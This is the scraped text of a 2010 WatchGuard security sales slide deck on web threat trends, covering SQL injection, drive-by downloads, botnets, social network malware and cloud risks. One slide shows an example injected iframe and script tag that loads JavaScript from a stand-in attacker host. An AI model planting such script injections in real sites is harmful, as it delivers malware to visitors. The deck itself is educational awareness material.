330 likes | 456 Views
Securing the NOW. Coy Thorp Security Sales Engineer, WatchGuard. 2010 Threat Trends. The Web is Still the Primary Threat Vector. Why Attackers Moved to the Web. Common Web Attacks. Combined Web Attacks Common. Part 2: Drive-by Download. Part 1: Automated SQL Injection Attack. DB. DB.
E N D
Securing the NOW Coy Thorp Security Sales Engineer, WatchGuard
Combined Web Attacks Common Part 2: Drive-by Download Part 1: Automated SQL Injection Attack DB DB <iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe>
Social Networks = Malware Cesspool Huge Popularity Social Issues Technical Issues
Malware Volume Out of Control x6 ??? x3
Bot Client (Trojan) Most Popular Payload Most Common “Child” Malware Microsoft Security Intelligence Report 2009 Most Common “Parent” Malware Microsoft Security Intelligence Report 2009
Malware Delivery More Dynamic/Agile Between their increased reliance on botnets and the introduction of new evasion techniques, the servers that deliver malware have become much more dynamic and Agile
Attackers Data Focused Attackers are financially motivated and sensitive data is valuable Security solutions that directly protect data (DLP, full disk encryption) will become more popular in 2010 and beyond.
“Cloud Computing” Presents Dangers Cloud computing solutions (SaaS, PaaS, etc.) are exciting and useful, but they use complex technologies that introduce security issues – primarily issues centered around entrusting sensitive data with a 3rd party
Cloud-based Security Presents Opportunities! Sharing “security intelligence” gathered by thousands of security appliances to one cloud-based authority will solve many security problems, and doesn’t not tend to share the security risks of “cloud computing”
I mean, Thank You! Heh, j/k ;) You’re Welcome!